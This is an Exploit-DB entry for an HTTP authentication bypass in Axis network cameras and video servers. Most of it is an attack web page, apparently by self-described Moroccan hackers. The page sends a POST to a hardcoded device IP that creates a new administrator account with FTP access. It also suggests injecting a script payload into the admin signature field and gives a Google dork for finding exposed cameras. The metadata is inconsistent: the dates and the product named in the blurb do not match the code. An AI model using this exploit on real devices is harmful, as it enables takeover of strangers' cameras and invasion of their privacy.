Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass

2004-08-23T00:00:00
ID EDB-ID:24402
Type exploitdb
Reporter bashis
Modified 2004-08-23T00:00:00

Description

Axis Network Camera 2.x And Video Server 1-3 HTTP Authentication Bypass. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/11011/info

A hardcoded backdoor administrative-user issue allows remote attackers to administer affected devices. This likely cannot be disabled.
 
This issue is reported to affect:
- Axis StorePoint CD E100 CD-ROM Server with firmware version 5.30
 
<?php
###########################################################################
#          03/11/2007 | 3:00        #
#    |#|axisNC.php        #
#          |#|Axis Network Camera HTTP Authentication Bypass|#|
#
#                          Exploit:        #
#              plz help as friend to ours new project iam or maroc 
telecom
                      company                                    #
#                         By  ConcorDHacK and xcoder            #
#                    moroccan-hackers-sabotage.co.ma                      
#
#|    Remplace [IP]or[Hostname] by onother IP or Hostname    #
#          |#|Affected Products|#|       #
#           #
# AXIS 2100 Network Camera versions 2.32 and previous    #
# AXIS 2110 Network Camera versions 2.32 and previous    #
# AXIS 2120 Network Camera versions 2.32 and previous    #
# AXIS 2130 PTZ Network Camera versions 2.32 and previous    #
# AXIS 2400 Video Server versions 2.32 and previous    #
# AXIS 2401 Video Server versions 2.32 and previous    #
# AXIS 2420 Network Camera versions 2.32 and previous    #
# AXIS 2460 Network DVR versions 3.00 and previous    #
# AXIS 250S Video Server versions 3.02 and previous    #
# i know this exploit its old but the new is if add new password
         this password give you ftp access
!!!!!!!!!!!!!!!!!!!!!!!!!          #
#    |#|Google dork : intitle:"Axis 2100 Network Camera" ....       #
#           #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
?>
<style
type="text/css">body{background-color:black; 
SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; color:   red; } img 
{background-color:#FFFFFF}
input  {background-color:black} option{ background-color: black}   
textarea
{background-color: black } input {color: red } option {color: red 
}textarea
{color: red }checkbox{background-color: black }select {font-weight:
normal;
color:
#1CB081;background-color:black;}body{font-size:8pt;background-color:
black;body * {font-size: 8pt } h1 {font-size:0.8em }h2{font-size:0.8em}  
h3
{font-size: 0.8em} h4,h5,h6{font-size:0.8em}h1 font{font-size:0.8em}h2 
font
{font-size:0.8em } h3 font {font-size:  0.8em}h4 font,h5  font,h6      
font
{font-size:  0.8em } *  {font-style:  normal }    *{text-decoration: 
none }
a:link,a:active,a:visited{ text-decoration: none ; color : black; } 
a:hover
{text-decoration: underline;color : black; } .Stile5 {font-family: 
Verdana,
Arial, Helvetica,  sans-serif;  font-size: 10px; }  .Stile6   
{font-family:
Verdana,  Arial,  Helvetica,     sans-serif;font-weight:bold;   
font-style:
italic;}--></style>
<script LANGUAGE="JavaScript">
var password = new Array(20)
function formatPassword(pwString)
{
var code
var pwCoded = ""
for (var i=0; i<pwString.length; i++) {
code = pwString.charCodeAt(i)
if (code < 10)
pwCoded += "00" + code
else if (code < 100)
pwCoded += "0" + code
else
pwCoded += code
}
return pwCoded
}
function parseUsers()
{
var form = document.WizardForm
var list = form.users
var str = form.conf_Security_List.value
var name
var rights
var pwCoded
var pwString
var noOfUsers = 0
var index = str.indexOf(":")
list.length = 0
while (!(index == -1)) {
name = str.substr(0,index)
str = str.substr(index+1, str.length-index-1)
index = str.indexOf(":")
rights = str.substr(0,index)
str = str.substr(index+1, str.length-index-1)
index = str.indexOf(":")
pwCoded = str.substr(0,index)
str = str.substr(index+1, str.length-index-1)
pwString = ""
list.length++
list.options[noOfUsers].value = name
if (rights.length > 0)
list.options[noOfUsers].text = name + ":" + rights
else
list.options[noOfUsers].text = name
password[noOfUsers] = pwString
noOfUsers++
index = str.indexOf(":")
}
}
function formatUsers()
{
var form = document.WizardForm
var list = form.users
var str = ""
for (var i=0; i<list.length; i++) {
str = str + list.options[i].text
if (isAdmin(i) || isView(i) || isDial(i))
str += ":"
else
str += "::"
str +=  formatPassword(password[i]) + ":"
}
form.conf_Security_List.value = str
}
function contains(ch, index)
{
var form = document.WizardForm
var list = form.users
var text = list.options[index].text
var lenValue = list.options[index].value.length
var lenText  = text.length
if (lenValue == lenText) {
return false  // No user rights
} else {
for (var i=lenValue+1; i<lenText; i++) {
if (text.charAt(i) == ch) {
return true
}
}
return false
}
}
function isAdmin(index)
{
return contains("A", index)
}
function isView(index)
{
return contains("V", index)
}
function isDial(index)
{
return contains("D", index)
}
function UserChange()
{
var form = document.WizardForm
var list = form.users
var index = list.selectedIndex
form.username.value = list.options[index].value
form.password1.value = password[index]
form.password2.value = password[index]
form.checkAdmin.checked = isAdmin(index)
form.checkDial.checked = isDial(index)
form.checkView.checked = isView(index)
}
function deleteUser()
{
var list = document.WizardForm.users
if ((list.selectedIndex != -1) &&
(list.options[list.selectedIndex].text.substr(0,4)
== "root")) {
alert("The 'root' user cannot be deleted.")
} else if (!(list.selectedIndex == -1)) {
for (var i = list.selectedIndex; i<list.length-1 ; i++) {
list.options[i].text = list.options[i+1].text
list.options[i].value = list.options[i+1].value
password[i] = password[i+1]
}
list.length--
}

if (list.selectedIndex == -1)
list.selectedIndex = list.length-1
UserChange()
}
function addUserButton()
{
addUser(false)  // false means that an empty user is not accepted
}
function addUser(ignoreEmptyUser)
{
var form = document.WizardForm
var list = form.users
var newUser
var index = -1
if ((ignoreEmptyUser) && (form.username.value == ""))
return 1
if (list.length == 20) {
alert("It is not possible to add more than 20 users.")
form.username.select()
form.username.focus()
return 0
}
if (list.length == 1 && list.options[0].value == "")
index = 0
else {
for (var i = 0; i<list.length ; i++) {
if (list.options[i].value == form.username.value)
index = i
}
}
newUser = (index == -1)
if ((checkUserName() == 1) && (checkPasswords(newUser) == 1) &&
(checkRights() == 1)) {
if (newUser) {
index = list.length
list.length++
}
list.options[index].value = form.username.value
list.options[index].text = form.username.value + strRights()
password[index] = form.password1.value
} else {
return 0
}
list.selectedIndex = index
return 1
}
function clearUser()
{
var form = document.WizardForm
form.username.value = ""
form.password1.value = ""
form.password2.value = ""
}
function strRights()
{
var form = document.WizardForm
var str = ":"
if (!(form.checkAdmin.checked || form.checkDial.checked ||
form.checkView.checked))
return ""
if (form.checkAdmin.checked)
str += "A"
if (form.checkDial.checked)
str += "D"
if (form.checkView.checked)
str += "V"
return str
}
function checkUserName()
{
var form = document.WizardForm
var aName = form.username.value
var c
for (var i = 0; i < aName.length; i++)
{
c = aName.charAt(i)
}
return 1
}
function checkPasswords(newUser)
{
var form = document.WizardForm
var aPass1 = form.password1.value
var aPass2 = form.password2.value
var c
return 1
}
function checkRights()
{
var form = document.WizardForm
var aAdmin = form.checkAdmin
var aDial = form.checkDial
var aView = form.checkView
if (!(aAdmin.checked || aDial.checked || aView.checked)) {
alert("Select User Rights before adding user.")
aAdmin.focus()
aAdmin.select()
return 0
}
return 1
}
//-->
</script>
<script LANGUAGE="JavaScript">
<!--
function onLoad()
{
parseUsers()
}
function saveData()
{
var form = document.WizardForm
if (addUser(true) == 1) {  // true means "ignore empty user"
formatUsers()
form.submit()
}
}
//-->
</script>
</HEAD>
<BODY BGCOLOR="black" LINK="gray" VLINK="gray" ALINK="gray"
ONLOAD="onLoad()">
<TABLE BORDER="0" WIDTH="1100" HEIGHT="400" CELLSPACING="0" 
CELLPADDING="0">
<TR><TD COLSPAN="2">




<FORM ACTION="http://194.168.163.96//this_server/ServerManager.srv"
METHOD="POST" NAME="WizardForm">




<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR><TD COLSPAN="2">
<INPUT TYPE="hidden" NAME="conf_Security_List" VALUE="root:ADVO::">
<FONT FACE="ARIAL, GENEVA" SIZE="2"><B>A script By ConcorDHacK <br><a 
href="
http://www.hackzord-security.fr.tc"><font color="red"><i><u>[
www.hackzord-security.fr.tc]</a></B></FONT>
</TD><BR><BR></TR><TR><TD COLSPAN="2"><FONT FACE="Arial, Geneva"
SIZE="2"><SELECT NAME="users" SIZE="2" onchange="UserChange()">
<OPTION value="Dummy">WWWWWWWWWW:ADV
</SELECT></FONT></TD><TD></TD><TR><TD 
COLSPAN="2"></TD><TD></TD></TR><TR><TD
COLSPAN="4"><HR></TD></TR><TR><TD><FONT FACE="Arial, Geneva" 
SIZE="2"><b>New
Admin:</FONT></TD>
<TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT name="username" 
type="text"
size="30"> (Ex : ConcorDHacK or just root)</FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva"
SIZE="2"><b>Password:</FONT></TD><TD><FONT FACE="Arial, Geneva"
SIZE="2"><INPUT name="password1" type="password" size="30">
Password of your choice (Ex : 123456 )</FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva" SIZE="2"><b>Verify:</FONT></TD>
<TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT name="password2"
type="password" size="30"> Confirm your password</FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva" 
SIZE="2"><b>Signature:</FONT></TD>
<TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT name="conf_Image_UseText"
type="text" size="30" value=""> Your signature in the administration by
HTML/Javascript code  after "> (Ex : ">
<script>alert("LOL")</script></pre></FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva" SIZE="2"><b>User Rights:
</FONT></TD><TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT 
NAME="checkAdmin"
TYPE="checkbox"><b>Admin
<TR><TD></TD><TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT 
NAME="checkDial"
TYPE="checkbox"><b> Dial-in </TD></TR></font><TR><TD></TD><TD><FONT
FACE="Arial, Geneva" SIZE="2">
<INPUT NAME="checkView" TYPE="checkbox"><b> View
</TD></TR></FONT></TD></TR><TR><TD COLSPAN="2" ALIGN="center"><br>
<table border="0" cellspacing="1" cellpadding="1"
width="300"bgcolor="#ffffff"><tr><td bgcolor="red" width="20%"
height="16"><center><b><font color="black"><A
HREF="javascript:saveData()">-=[Go!Go!]=-</A></font></td>
</TD></TR></TABLE><INPUT TYPE="HIDDEN" NAME="servermanager_return_page"
VALUE="/admin/setgen/security.shtml">
<INPUT TYPE="HIDDEN" NAME="servermanager_do"
VALUE="set_variables"></FORM></TD></TR></TABLE></BODY></HTML>